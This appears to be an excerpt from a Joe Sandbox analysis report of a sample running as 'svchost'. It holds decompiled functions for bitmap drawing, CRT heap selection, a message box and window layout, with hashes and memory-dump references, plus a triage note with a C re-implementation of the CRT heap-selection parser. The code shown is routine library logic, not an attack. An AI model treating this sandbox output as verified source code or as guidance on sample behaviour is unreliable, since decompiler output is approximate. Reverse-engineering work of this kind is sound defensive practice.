    • Instruction ID: 55c3d0b70aa33324e609945cb42cd12f9c3393deba576fca954bc37d40e81545
    • Opcode Fuzzy Hash: b9fd26a8452a3f5e6ee7d4593aeb7295229aa5203e7fef9d2564f7c2ea97ad05
    • Instruction Fuzzy Hash: EE717F766102008BDB14CF29D8917A6B7D5EF89320F18857EED0DCF386EB798805C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004261B0(void* __eflags, intOrPtr __fp0, intOrPtr _a4, intOrPtr _a8) {
    				char _v8;
    				intOrPtr _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				int _v36;
    				int _v40;
    				void* _v52;
    				signed int _v56;
    				int _v60;
    				void* _v72;
    				char _v76;
    				char _v80;
    				intOrPtr _v92;
    				char _v96;
    				signed int _v104;
    				char _v108;
    				intOrPtr _v112;
    				void* _v120;
    				char _v124;
    				void* _v136;
    				void* _v144;
    				void* _v148;
    				void* _v156;
    				void* __ebp;
    				void* _t63;
    				struct HICON__* _t64;
    				intOrPtr _t123;
    				struct HICON__* _t125;
    				intOrPtr _t126;
    				struct HICON__* _t131;
    				void* _t136;
    				intOrPtr _t142;
    				void* _t143;
    
    				_push(0xffffffff);
    				_push(E0048F010);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t142;
    				_t143 = _t142 - 0x44;
    				_t130 = _a8;
    				_t122 = _a4;
    				_t136 = E004267F0(_a4, _a8);
    				if(_t136 != 0) {
    					_t131 = E00425870(_t136, _t122, _t130);
    					__eflags = _t131;
    					if(__eflags != 0) {
    						_push(0);
    						_v32 = 0;
    						_v36 = 0;
    						_v20 = 0;
    						_v16 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_t123 = 0;
    						E00489C16( &_v56, __eflags);
    						_v8 = 0;
    						_t63 = E00425950(__fp0,  &_v60, _t131,  &_v40, _a8);
    						__eflags = _t63 - 1;
    						if(_t63 == 1) {
    							__eflags = _t136 - 3;
    							if(_t136 == 3) {
    								L8:
    								E004892C7( &_v76);
    								asm("sbb eax, eax");
    								_v8 = 1;
    								E0048937E( &_v80, CreateCompatibleDC( ~( &_v60) & _v56));
    								 *((intOrPtr*)(_t143 + 0x14)) = 0;
    								_v92 = 0x496a58;
    								_v16 = 2;
    								E00489EBE( &_v104, CreateCompatibleBitmap( *(_t143 + 0x2c), _v40, _v36));
    								_t31 =  &_v108; // 0x496a58
    								asm("sbb eax, eax");
    								_t125 = E004894BF(_v96,  ~_t31 & _v104);
    								PatBlt(_v104, 0, 0,  *(_t143 + 0x44), _v60, 0xff0062);
    								_v96 =  *((intOrPtr*)(_t143 + 0x1c));
    								E00425D90( *((intOrPtr*)(_t143 + 0x1c)),  &_v96, 0, 0, 0xffffffff, 0xffffffff, 0xcc0020);
    								__eflags = _t125;
    								if(_t125 != 0) {
    									_t126 =  *((intOrPtr*)(_t125 + 4));
    								} else {
    									_t126 = 0;
    								}
    								E004894BF(_v112, _t126);
    								_t41 = _t143 + 0x10; // 0x496a58
    								_t123 = E00489EEB(_t41);
    								 *((intOrPtr*)(_t143 + 0x10)) = 0x496a4c;
    								_t43 = _t143 + 0x10; // 0x496a4c
    								_v56 = 3;
    								E00489F15(_t43);
    								_v56 = 0;
    								E004893FC( &_v124);
    							} else {
    								__eflags = _t136 - 4;
    								if(_t136 == 4) {
    									goto L8;
    								} else {
    									_t123 = _v20;
    									_v20 = 0;
    								}
    							}
    							E004260F0( &_v80);
    						}
    						_t64 =  *(_t131 + 0xc);
    						_t131->i = 0;
    						__eflags = _t64;
    						 *((intOrPtr*)(_t131 + 4)) = 0;
    						 *((intOrPtr*)(_t131 + 8)) = 0;
    						 *((intOrPtr*)(_t131 + 0x14)) = 0;
    						if(_t64 != 0) {
    							DestroyCursor(_t64);
    							 *(_t131 + 0xc) = 0;
    						}
    						_t65 =  *(_t131 + 0x10);
    						__eflags =  *(_t131 + 0x10);
    						if(__eflags != 0) {
    							E0048302C(_t65);
    							_t143 = _t143 + 4;
    							 *(_t131 + 0x10) = 0;
    						}
    						E0048302C(_t131);
    						_v8 = 0xffffffff;
    						E00489C88( &_v60, __eflags);
    						 *[fs:0x0] = _v16;
    						return _t123;
    					} else {
    						__eflags = 0;
    						 *[fs:0x0] = _v12;
    						return 0;
    					}
    				} else {
    					 *[fs:0x0] = _v12;
    					return 0;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: XjI
    • API String ID: 0-234675203
    • Opcode ID: 7f36fb9c0be06620688f6e163ee5c2e8d6595ac97fcb3065c9d8a741c963659f
    • Instruction ID: 3c2e617f6b18db470dae2fce2bbe79e454e24b6ff248d4784e2a9fc24e032d88
    • Opcode Fuzzy Hash: 7f36fb9c0be06620688f6e163ee5c2e8d6595ac97fcb3065c9d8a741c963659f
    • Instruction Fuzzy Hash: 92515AB25087519FC310EF69D88096FFBE8BB89714F448E2EF5A583240D779D809CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00474CC9(void* __ecx, void* __eflags) {
    				char _v8;
    				struct _OSVERSIONINFOA _v156;
    				char _v416;
    				char _v4656;
    				void* _t24;
    				CHAR* _t32;
    				void* _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				char _t36;
    				char _t38;
    				void* _t40;
    				char* _t44;
    				char* _t45;
    				char* _t50;
    
    				E00471390(0x122c, __ecx);
    				_v156.dwOSVersionInfoSize = 0x94;
    				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
    					_t40 = 1;
    					return _t40;
    				}
    				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
    					L28:
    					_t24 = E00474C9C( &_v8);
    					asm("sbb eax, eax");
    					return _t24 + 3;
    				}
    				_t44 =  &_v4656;
    				if(_v4656 != 0) {
    					do {
    						_t38 =  *_t44;
    						if(_t38 >= 0x61 && _t38 <= 0x7a) {
    							 *_t44 = _t38 - 0x20;
    						}
    						_t44 = _t44 + 1;
    					} while ( *_t44 != 0);
    				}
    				if(E00470280("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
    					GetModuleFileNameA(0,  &_v416, 0x104);
    					_t45 =  &_v416;
    					if(_v416 != 0) {
    						do {
    							_t36 =  *_t45;
    							if(_t36 >= 0x61 && _t36 <= 0x7a) {
    								 *_t45 = _t36 - 0x20;
    							}
    							_t45 = _t45 + 1;
    						} while ( *_t45 != 0);
    					}
    					_t32 = E00471B70( &_v4656,  &_v416);
    				} else {
    					_t32 =  &_v4656;
    				}
    				if(_t32 == 0) {
    					goto L28;
    				}
    				_t33 = E00471C80(_t32, 0x2c);
    				if(_t33 == 0) {
    					goto L28;
    				}
    				_t34 = _t33 + 1;
    				_t50 = _t34;
    				if( *_t34 != 0) {
    					do {
    						if( *_t50 != 0x3b) {
    							_t50 = _t50 + 1;
    						} else {
    							 *_t50 = 0;
    						}
    					} while ( *_t50 != 0);
    				}
    				_t35 = E00473C08(_t34, 0, 0xa);
    				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
    					goto L28;
    				}
    				return _t35;
    			}

    (per-statement instruction address column for E00474CC9, 0x00474cd1 to 0x00474e10, omitted)

    APIs
    • GetVersionExA.KERNEL32 ref: 00474CE8
    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00474D1D
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00474D7D
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnvironmentFileModuleNameVariableVersion
    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
    • API String ID: 1385375860-4131005785
    • Opcode ID: 0c73f020cf8bb1e2da261f5da72e3e1293850ec5ba4f1064243c60b53610c3cf
    • Instruction ID: 09e23c8e2169c8f26c5db60c5e0b5cc194c3271f0ec15cee981eb308adf3adc4
    • Opcode Fuzzy Hash: 0c73f020cf8bb1e2da261f5da72e3e1293850ec5ba4f1064243c60b53610c3cf
    • Instruction Fuzzy Hash: 933126719012986EEB3597B45C51BFE37689B42304F2484EBD1CDC6252E73C8EC9CB19
    Uniqueness

    Uniqueness Score: -1.00%
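    Triage note on E00474CC9: the strings __MSVCRT_HEAP_SELECT and __GLOBAL_HEAP_SELECTED and the GetVersionExA / GetEnvironmentVariableA / GetModuleFileNameA sequence are the heap-selection routine of the statically linked Microsoft C runtime (__heap_select in the CRT's heapinit.c), not logic written by the sample's author. The listing also shows that on Windows NT 5.0 and later (dwPlatformId == 2, dwMajorVersion >= 5) the routine returns 1 before the environment variable is read, so on the sandbox's OS the selector string is never consulted. The C below is an added re-implementation of the parser half of that routine, written for this page and not code from the sample or from Microsoft: the names heap_select_parse, heap_choice and ascii_upcase, the 32-byte value buffer and the selector strings in main are assumptions, the OS check is left out, and the fall-through path the decompiler labels L28 is represented by the return value HEAP_UNSET.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return values keep the numbering the decompiled routine returns:
   1 = system (NT) heap, 2 = V5 heap, 3 = V6 small-block heap.
   HEAP_UNSET (0) stands for the fall-through path the decompiler labels L28. */
enum heap_choice { HEAP_UNSET = 0, HEAP_SYSTEM = 1, HEAP_V5 = 2, HEAP_V6 = 3 };

/* Byte-wise ASCII upper-casing: the 0x61..0x7a / -0x20 loop in the listing. */
static void ascii_upcase(char *s)
{
    for (; *s != '\0'; s++) {
        if (*s >= 'a' && *s <= 'z')
            *s -= 0x20;
    }
}

/* Decide the heap the way E00474CC9 does once the OS check has fallen through.
   env     : value of __MSVCRT_HEAP_SELECT, or NULL when the variable is unset
   modpath : what GetModuleFileNameA(NULL, ...) returns for the process
   The selector is either "__GLOBAL_HEAP_SELECTED,<n>" (applies to every module)
   or a ';'-separated list of "<module path>,<n>" entries, matched by looking
   for the upper-cased module path inside the upper-cased selector.  Only 1, 2
   and 3 are accepted as <n>. */
enum heap_choice heap_select_parse(const char *env, const char *modpath)
{
    char sel[0x1090];   /* capacity passed to GetEnvironmentVariableA */
    char mod[0x104];    /* capacity passed to GetModuleFileNameA      */
    char value[32];     /* assumed: room for the digits after the ',' */
    const char *hit;
    const char *comma;
    size_t n;
    long v;

    /* GetEnvironmentVariableA returns 0 for an unset or empty variable. */
    if (env == NULL || env[0] == '\0')
        return HEAP_UNSET;

    snprintf(sel, sizeof sel, "%s", env);
    ascii_upcase(sel);

    if (strncmp("__GLOBAL_HEAP_SELECTED", sel, 0x16) == 0) {
        hit = sel;                          /* global entry: no path match needed */
    } else {
        snprintf(mod, sizeof mod, "%s", modpath != NULL ? modpath : "");
        ascii_upcase(mod);
        hit = strstr(sel, mod);             /* E00471B70: locate this module's entry */
    }
    if (hit == NULL)
        return HEAP_UNSET;

    comma = strchr(hit, ',');               /* E00471C80: <n> follows the next ',' */
    if (comma == NULL)
        return HEAP_UNSET;
    comma++;

    /* The listing NUL-terminates at the first ';'; copy up to it instead. */
    n = strcspn(comma, ";");
    if (n >= sizeof value)
        n = sizeof value - 1;
    memcpy(value, comma, n);
    value[n] = '\0';

    v = strtol(value, NULL, 10);            /* E00473C08: base-10 conversion */
    if (v != 1 && v != 2 && v != 3)
        return HEAP_UNSET;                  /* any other value falls through to L28 */
    return (enum heap_choice)v;
}

int main(void)
{
    /* Constructed inputs: a two-entry selector and the paths of both modules. */
    const char *selector = "c:\\app\\a.exe,1;c:\\app\\b.exe,3";
    printf("b.exe -> %d\n", heap_select_parse(selector, "C:\\App\\B.exe"));
    printf("a.exe -> %d\n", heap_select_parse(selector, "C:\\App\\A.exe"));
    return 0;
}
```

    The decompiled routine overwrites the first ';' after the value with a NUL in place; copying the value into a separate buffer is equivalent here, because strtol stops at the first non-digit in either case. Matching by strstr means a selector entry for one path also matches any longer module path that contains it, which is the CRT's behaviour as listed, not a property added by this example.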

    C-Code - Quality: 100%
    			E0048ACE9(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
    				struct HWND__* _v8;
    				int _v12;
    				struct HWND__* _v16;
    				intOrPtr _v20;
    				char _v280;
    				struct HWND__* _t23;
    				signed int _t32;
    				intOrPtr _t34;
    				long _t36;
    				int _t38;
    				intOrPtr _t41;
    				CHAR* _t42;
    				int _t43;
    				long _t44;
    
    				_t41 = __ecx;
    				_v20 = __ecx;
    				E0048ACBB(0);
    				_t23 = E0048AE61(0,  &_v8);
    				_t44 = 0;
    				_v16 = _t23;
    				if(_t23 == 0) {
    					L3:
    					if(_t41 != 0) {
    						_t5 = _t41 + 0x9c; // 0x9c
    						_t44 = _t5;
    					}
    					L5:
    					_v12 = 0;
    					if(_t44 != 0) {
    						_v12 =  *_t44;
    						_t34 = _a12;
    						if(_t34 != 0) {
    							 *_t44 = _t34 + 0x30000;
    						}
    					}
    					_t38 = _a8;
    					if((_t38 & 0x000000f0) == 0) {
    						_t32 = _t38 & 0x0000000f;
    						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
    							_t38 = _t38 | 0x00000030;
    						}
    					}
    					if(_t41 == 0) {
    						_t42 =  &_v280;
    						GetModuleFileNameA(0,  &_v280, 0x104);
    					} else {
    						_t42 =  *(_t41 + 0x78);
    					}
    					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
    					if(_t44 != 0) {
    						 *_t44 = _v12;
    					}
    					if(_v8 != 0) {
    						EnableWindow(_v8, 1);
    					}
    					E0048ACBB(1);
    					return _t43;
    				}
    				_t36 = SendMessageA(_v8, 0x376, 0, 0);
    				if(_t36 == 0) {
    					goto L3;
    				} else {
    					_t44 = _t36;
    					goto L5;
    				}
    			}

    (per-statement instruction address column for E0048ACE9, 0x0048acf7 to 0x0048adcd, omitted)

    APIs
      • Part of subcall function 0048AE61: GetParent.USER32(?), ref: 0048AE94
      • Part of subcall function 0048AE61: GetLastActivePopup.USER32(?), ref: 0048AEA3
      • Part of subcall function 0048AE61: IsWindowEnabled.USER32(?), ref: 0048AEB8
      • Part of subcall function 0048AE61: EnableWindow.USER32(?,00000000), ref: 0048AECB
    • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0048AD1F
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0048AD8D
    • MessageBoxA.USER32(00000000,?,?,00000000), ref: 0048AD9B
    • EnableWindow.USER32(00000000,00000001), ref: 0048ADB7
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
    • String ID: P8H
    • API String ID: 1958756768-4234511099
    • Opcode ID: dab508968a35e1337f3707866c5c45a5c509192bf03a1b4d91a8c4cf7d0ebfa1
    • Instruction ID: fbd98c79f6c6667c5b00a0fb988db7701a7e3effe201aa7421a71902ea7d835c
    • Opcode Fuzzy Hash: dab508968a35e1337f3707866c5c45a5c509192bf03a1b4d91a8c4cf7d0ebfa1
    • Instruction Fuzzy Hash: 1821A272900108AFEB20EFA4CC81AEEB7F6EB44715F14083BE651E7690D7B99D508B56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00418BA0(intOrPtr __ecx, void* __eflags) {
    				intOrPtr* _t142;
    				signed int _t144;
    				void* _t146;
    				void* _t149;
    				signed int _t150;
    				intOrPtr* _t151;
    				struct tagRECT _t156;
    				signed int _t168;
    				void* _t170;
    				void* _t171;
    				signed int _t176;
    				signed int _t177;
    				signed int _t195;
    				void* _t208;
    				intOrPtr* _t215;
    				void* _t216;
    				void* _t217;
    				signed int _t219;
    				void* _t222;
    				void* _t223;
    				void* _t226;
    				intOrPtr _t229;
    				void* _t230;
    				void* _t231;
    				void* _t232;
    
    				_push(0xffffffff);
    				_push(E0048E6A8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t229;
    				_t230 = _t229 - 0x30;
    				 *((intOrPtr*)(_t230 + 0x14)) = __ecx;
    				 *((intOrPtr*)(_t230 + 0x18)) = 0;
    				 *((intOrPtr*)(_t230 + 0x1c)) = 0;
    				if(E00413AB0(__ecx + 0x104, __eflags,  *((intOrPtr*)(_t230 + 0x48)), _t230 + 0x48, 0) != 0) {
    					_t142 = E00413630( *((intOrPtr*)(_t230 + 0x48)) + 0x14, __eflags,  *((intOrPtr*)(_t230 + 0x50)), 0, 0);
    					_t183 = _t230 + 0x2c;
    					_t215 = _t142;
    					E0040B5D0(_t230 + 0x2c);
    					 *((intOrPtr*)(_t230 + 0x4c)) = 0;
    					_t144 = E00413C60(__eflags,  *((intOrPtr*)(_t230 + 0x50)));
    					_t231 = _t230 + 4;
    					__eflags = _t144;
    					if(_t144 == 0) {
    						_t146 = E00417F60(__ecx,  *_t215, 0);
    						_t176 =  *(_t231 + 0x58);
    						_t226 = _t146;
    						_t25 = _t215 + 0x18; // 0x18
    						_t208 = _t25;
    						_t216 = _t208;
    						 *((intOrPtr*)(_t231 + 0x5c)) =  *((intOrPtr*)(_t226 + 0x28)) + (_t176 + _t176 * 4) * 4;
    						_t217 = _t216 + E0040C020(_t176 + _t176 * 4, _t216);
    						_t149 = E0040C020(_t176 + _t176 * 4, _t217);
    						_t232 = _t231 + 8;
    						_t219 =  *(_t217 + _t149);
    						__eflags = _t219;
    						if(_t219 == 0) {
    							L12:
    							_t150 = 0;
    							__eflags = 0;
    						} else {
    							_t185 =  *(_t219 + 0x1c);
    							_t168 = IsWindow( *(_t219 + 0x1c));
    							__eflags = _t168;
    							if(_t168 == 0) {
    								goto L12;
    							} else {
    								_t150 = 1;
    							}
    						}
    						__eflags = _t176 - 8;
    						if(_t176 >= 8) {
    							__eflags = _t150;
    							if(_t150 == 0) {
    								E00417E20(0x4ace80, _t150);
    							}
    							_t151 =  *((intOrPtr*)(_t226 + 0x2c))(6);
    							_t177 = _t176 + 0xfffffff8;
    							__eflags = _t177;
    							 *(_t232 + 0x20) = 0;
    							 *((intOrPtr*)(_t232 + 0x2c)) = 0;
    							 *_t151(_t219, _t177, _t232 + 0x1c);
    							E004194C0( *((intOrPtr*)(_t232 + 0x18)),  *((intOrPtr*)(_t232 + 0x5c)),  *((intOrPtr*)(_t232 + 0x5c)),  *((intOrPtr*)(_t232 + 0x5c)), _t232 + 0x1c, _t232 + 0x14);
    							goto L45;
    						} else {
    							__eflags = _t176 - 7;
    							if(_t176 > 7) {
    								goto L45;
    							} else {
    								switch( *((intOrPtr*)(_t176 * 4 +  &M00419000))) {
    									case 0:
    										__eflags = _t150 - 1;
    										if(_t150 != 1) {
    											_t211 = _t208 + E0040C020(_t185, _t208);
    											_t160 = E0040C020(_t185, _t211);
    											_t232 = _t232 + 8;
    											__eflags = _t176 - 1;
    											_t45 = _t160 + 4; // 0x1c
    											_t161 = _t211 + _t45;
    											if(_t176 == 1) {
    												_t161 = _t161 + 4;
    												__eflags = _t161;
    											}
    											goto L25;
    										} else {
    											GetWindowRect( *(_t219 + 0x1c), _t232 + 0x1c);
    											_t212 = E00484C84(_t226, GetParent( *(_t219 + 0x1c)));
    											__eflags = _t212;
    											if(_t212 != 0) {
    												_t166 = E004874EA(_t219);
    												__eflags = _t166 & 0x80000000;
    												if((_t166 & 0x80000000) == 0) {
    													E00489A84(_t212, _t232 + 0x1c);
    												}
    											}
    											_t156 =  *(_t232 + 0x1c);
    											__eflags = _t176;
    											if(_t176 != 0) {
    												_t156 =  *(_t232 + 0x20);
    											}
    											 *(_t232 + 0x14) = _t156;
    										}
    										goto L46;
    									case 1:
    										__eflags = __eax - 1;
    										if(__eax != 1) {
    											__edi = __edi + E0040C020(__ecx, __edi);
    											__eax = E0040C020(__ecx, __edi);
    											__eflags = __ebx - 3;
    											_t56 = __eax + 0xc; // 0xc
    											__eax = __edi + _t56;
    											if(__ebx != 3) {
    												L25:
    												_t156 =  *_t161;
    												 *(_t232 + 0x14) = _t156;
    											} else {
    												__eax = __eax + 4;
    												 *(__esp + 0x14) = __eax;
    											}
    										} else {
    											__ecx =  *(__esi + 0x1c);
    											__esp + 0x1c = GetWindowRect( *(__esi + 0x1c), __esp + 0x1c);
    											__eflags = __ebx - 2;
    											if(__ebx != 2) {
    												__eax =  *(__esp + 0x28);
    												__ecx =  *(__esp + 0x20);
    												__eax =  *(__esp + 0x28) - __ecx;
    												 *(__esp + 0x14) =  *(__esp + 0x28) - __ecx;
    											} else {
    												__eax =  *(__esp + 0x24);
    												__ecx =  *(__esp + 0x1c);
    												__eax =  *(__esp + 0x24) - __ecx;
    												 *(__esp + 0x14) =  *(__esp + 0x24) - __ecx;
    											}
    										}
    										goto L46;
    									case 2:
    										__edi = __edi + E0040C020(__ecx, __edi);
    										__eax = E0040C020(__ecx, __edi);
    										__edx =  *(__edi + __eax + 0x1c);
    										_t61 = __eax + 0x1c; // 0x1c
    										__eax = __edi + _t61;
    										__ecx =  *(__eax + 4 + __edx * 4);
    										__eax = __ecx + __eax + 4;
    										 *(__esp + 0x14) = __eax;
    										goto L46;
    									case 3:
    										__eflags = __eax - 1;
    										if(__eax != 1) {
    											__edi = __edi + E0040C020(__ecx, __edi);
    											__eax = E0040C020(__ecx, __edi);
    											__edx =  *(__edi + __eax + 0x1c);
    											_t78 = __eax + 0x1c; // 0x1c
    											__eax = __edi + _t78;
    											__ecx =  *(__eax + 4 + __edx * 4);
    											__esi = __ecx + __eax + 4;
    											__eax = E0040C020(__ecx, __esi);
    											__eax =  *(__eax + __esi + 4);
    											 *(__esp + 0x14) = __eax;
    										} else {
    											__edx =  *(__esi + 0x1c);
    											__eax = IsWindowVisible( *(__esi + 0x1c));
    											__ecx = 0;
    											__eflags = __eax;
    											__ecx = 0 | __eax != 0x00000000;
    											__eax = __ecx;
    											 *(__esp + 0x14) = __ecx;
    										}
    										goto L46;
    									case 4:
    										__eflags = __eax - 1;
    										if(__eax != 1) {
    											__edi = __edi + E0040C020(__ecx, __edi);
    											__eax = E0040C020(__ecx, __edi);
    											__edx =  *(__edi + __eax + 0x1c);
    											_t94 = __eax + 0x1c; // 0x1c
    											__eax = __edi + _t94;
    											__ecx =  *(__eax + 4 + __edx * 4);
    											__esi = __eax + __ecx + 4;
    											__eax = E0040C020(__ecx, __esi);
    											__eax =  *(__eax + __esi + 4);
    											__eax = __eax >> 1;
    											 *(__esp + 0x14) = __eax;
    										} else {
    											__ecx = __esi;
    											__eax = E00487648(__ecx);
    											__eax =  ~__eax;
    											asm("sbb eax, eax");
    											 *(__esp + 0x14) = __eax;
    										}
    										goto L46;
    									case 5:
    										__edi = __edi + E0040C020(__ecx, __edi);
    										__eax = E0040C020(__ecx, __edi);
    										__edx =  *(__edi + __eax + 0x1c);
    										_t109 = __eax + 0x1c; // 0x1c
    										__eax = __edi + _t109;
    										__ecx =  *(__eax + 4 + __edx * 4);
    										__eax = __eax + 4 + __edx * 4;
    										__eflags = __ecx - 4;
    										if(__ecx < 4) {
    											__eax = __eax + 4;
    											_push(__ecx);
    											 *(__esp + 0x14) = __eax;
    										} else {
    											 *(__esp + 0x3c) = 0;
    											__ecx =  *__eax;
    											__eax = __eax + 4;
    											_push(__ecx);
    											__ecx = __esp + 0x34;
    											__eax = E0040BD00(__esp + 0x34, __eax);
    											__esi =  *(__esp + 0x3c);
    											__eax =  *(__esp + 0x34);
    											__esi =  ~( *(__esp + 0x3c));
    											asm("sbb esi, esi");
    											__esi =  ~( *(__esp + 0x3c)) &  *(__esp + 0x34);
    											__edx =  *__esi;
    											 *__esi = E00420180( *__esi);
    											__eax =  *(__esp + 0x40);
    											_push( *(__esp + 0x40));
    											 *(__esp + 0x14) = E00414830(__esi);
    										}
    										goto L46;
    								}
    							}
    						}
    					} else {
    						_t222 = _t215 + 0x18;
    						_t223 = _t222 + E0040C020(_t183, _t222);
    						_t170 = E0040C020(_t183, _t223);
    						_t195 =  *(_t231 + 0x60);
    						_t232 = _t231 + 8;
    						__eflags = _t195 - 3;
    						_t17 = _t170 + 8; // -16
    						_t171 = _t223 + _t17;
    						if(_t195 > 3) {
    							L45:
    							_t156 =  *(_t232 + 0x14);
    						} else {
    							switch( *((intOrPtr*)(_t195 * 4 +  &M00418FF0))) {
    								case 0:
    									_t156 = E004147A0(_t195, _t171 + 4);
    									_t232 = _t232 + 4;
    									 *(_t232 + 0x14) = _t156;
    									goto L46;
    								case 1:
    									__eax =  *__eax;
    									__eax = __eax >> 2;
    									 *(__esp + 0x14) = __eax;
    									goto L46;
    								case 2:
    									__eax =  *__eax;
    									__eax = __eax >> 1;
    									 *(__esp + 0x14) = __eax;
    									goto L46;
    								case 3:
    									__eax =  *__eax;
    									__eax =  !__eax;
    									 *(__esp + 0x14) = __eax;
    									goto L46;
    							}
    						}
    					}
    					L46:
    					 *((intOrPtr*)(_t232 + 0x48)) = 0xffffffff;
    					 *((intOrPtr*)(_t232 + 0x2c)) = 0x495e50;
    					E0040B7D0(_t232 + 0x2c);
    					 *[fs:0x0] =  *((intOrPtr*)(_t232 + 0x40));
    					return _t156;
    				} else {
    					E00417E20(0x4ace94, 0);
    					 *[fs:0x0] =  *((intOrPtr*)(_t230 + 0x30));
    					return  *((intOrPtr*)(_t230 + 0xc));
    				}
    			}

    (per-statement instruction address column for E00418BA0, 0x00418ba0 to 0x00418feb, omitted)

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
